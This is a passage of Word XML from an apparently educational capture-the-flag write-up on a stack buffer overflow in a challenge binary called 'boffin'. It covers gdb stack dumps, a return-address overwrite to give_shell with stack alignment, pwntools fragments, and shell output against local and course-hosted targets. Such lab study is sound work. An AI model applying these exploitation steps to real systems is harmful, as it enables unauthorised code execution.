          <w:p w14:paraId="33AEB4C3" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00581FB9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>rip            0x400719</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x400719</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &lt;main+67&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5059679E" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>(gdb) $ x/20x $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="10E8FCE1" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x7fffffffddd0:    0x41414141    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="553A0D77" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x7fffffffdde0:    0x41414141    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="2F23843E" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x7fffffffddf0:    0x41414141    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x41414141</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00581FB9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">0x0040071a </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">   0x00000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00951B97" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x7fffffffde00:    </w:t>
            </w:r>
            <w:r w:rsidRPr="00581FB9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x0040069d</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    0x00000000    0x004006d6    0x00000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="735013E5" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>0x7fffffffde10:    0x00000000    0x00000001    0xffffdf08    0x00007fff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E27E5A8" w14:textId="77777777" w:rsidR="00EB5499" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>(gdb) $ c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="409529BA" w14:textId="59DC54E4" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00581FB9">
              <w:t>Continuing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B5D97CC" w14:textId="5216A24F" w:rsidR="00EB5499" w:rsidRDefault="00581FB9" w:rsidP="00EB5499">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Breakpoint 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFA8C11" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2D3A7E" w14:textId="0B7E6BCF" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00555F5B">
      <w:r w:rsidRPr="00581FB9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">At line the first call to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:t xml:space="preserve"> method </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:t xml:space="preserve"> instruction, the address at the top of the stack points to that </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:t xml:space="preserve"> instruction, which is also equal to the value stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB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FB9" w14:paraId="62655207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1258CF6F" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Breakpoint 2, </w:t>
            </w:r>
            <w:r w:rsidRPr="00581FB9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x000000000040071a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in main ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="741A8726" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>(gdb) $ info registers rip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38BFC07E" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00581FB9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>rip            0x40071a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x40071a</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &lt;main+68&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F48716C" w14:textId="548ECFFA" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>(gdb) $ x/</w:t>
            </w:r>
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>x $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0934194D" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x7fffffffddf8:    </w:t>
            </w:r>
            <w:r w:rsidRPr="00581FB9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x0040071a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    0x00000000    </w:t>
            </w:r>
            <w:r w:rsidRPr="00581FB9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x0040069d</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    0x00000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E30279D" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>(gdb) $ c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4161DCED" w14:textId="2E74EE68" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00581FB9">
              <w:t>Continuing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6408BFE4" w14:textId="546FB955" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Breakpoint 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2670F49C" w14:textId="06013FA8" w:rsidR="00581FB9" w:rsidRDefault="00581FB9">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00581FB9">
        <w:t>Finally</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00581FB9">
        <w:t xml:space="preserve"> when </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:t xml:space="preserve"> is called for the second time, </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:t xml:space="preserve"> still points to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:t xml:space="preserve"> address, but the value at the top of the stack, which will be called when </w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00581FB9">
        <w:t xml:space="preserve"> runs, is the address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00581FB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FB9" w14:paraId="196A6176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431E74CE" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Breakpoint 2, </w:t>
            </w:r>
            <w:r w:rsidRPr="00581FB9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x000000000040071a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in main ()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0273E9B7" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>(gdb) $ info registers rip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33D9D405" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r w:rsidRPr="00581FB9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve">rip </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">           </w:t>
            </w:r>
            <w:r w:rsidRPr="00581FB9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x40071a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>0x40071a</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> &lt;main+68&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46A782AF" w14:textId="43BA6D6F" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>(gdb) $ x/</w:t>
            </w:r>
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>x $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="234D4D44" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0x7fffffffde00:    </w:t>
            </w:r>
            <w:r w:rsidRPr="00581FB9">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>0x0040069d</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    0x00000000    0x004006d6    0x00000000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4805F253" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>(gdb) $ c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="272E374A" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Continuing.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25ED3DD8" w14:textId="330BE342" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[Detaching after </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vfork</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> from child process 405647]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16250994" w14:textId="06088BD2" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Breakpoint 2 for the Second Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B02804" w14:textId="7BE0E139" w:rsidR="00555F5B" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">This method results in a proper call to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00581FB9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>give_shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that pushes the return value to the stack before executing the first instruction. This will keep the stack aligned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314FABD7" w14:textId="76B855A5" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="00555F5B">
      <w:r>
        <w:t xml:space="preserve">The new payload resulted in a shell when the exploit was run against a local instance of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C27BB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>boffi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27BB" w14:paraId="79E81957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292AFF9B" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB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pwnLocal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719CAA55" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># Start local instance</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="223F7498" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">p </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>=  process</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>('./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boffin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="162DE648" w14:textId="7768AC7A" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>getSafeShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(p)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2314C016" w14:textId="3AC8AC00" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwnLoc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FB9" w14:paraId="271C2239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CD5D6E0" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9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12A146F7" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Boffin_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F4A1317" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] Switching to interactive </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>mode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0BCDBBF1" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a\x07@</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EAFB263" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="655B75C0" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>kali</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00C13546" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0F256ED6" w14:textId="77777777" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t>/home/kali/Desktop/4-Week</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62530CBA" w14:textId="2A19C842" w:rsidR="00581FB9" w:rsidRDefault="00581FB9" w:rsidP="00581FB9">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve">$  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>zsh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>: suspended (signal)  python3 Boffin_Pwn.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BD3478B" w14:textId="097D987C" w:rsidR="00581FB9" w:rsidRDefault="009C27BB" w:rsidP="00581FB9">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Local Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAE57BE" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="139CE80F" w14:textId="78F3CA8C" w:rsidR="009F3B92" w:rsidRDefault="00555F5B" w:rsidP="00555F5B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Although the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>safely-designed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload is not necessary for remote exploitation, it does result in the successful exploitation of the remot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27BB" w14:paraId="2421A31E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1AAABF25" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB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shellRemote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2373AD4F" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t># Start remote session</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27CC7263" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">p = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>remote(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>HOST, PORT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="694D0CC4" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>#getShell(p)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AE5FCD7" w14:textId="4BEF9C03" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>getSafeShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(p)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="397B75AA" w14:textId="244F5F60" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellRemo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27BB" w14:paraId="632CA838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400C0F84" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB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29BC23A1" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 Boffin_Pwn.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31AFA7D0" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[+] Opening connection to offsec-chalbroker.osiris.cyber.nyu.edu on port 1337: Done</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0685887E" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[*] Switching to interactive </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>mode</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4BD2086A" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53999EA7" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a\x07@</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="476845D5" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="064BDC11" w14:textId="77777777" w:rsidR="009C27BB" w:rsidRDefault="009C27BB" w:rsidP="009C27BB">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwn</w:t>
            </w:r>
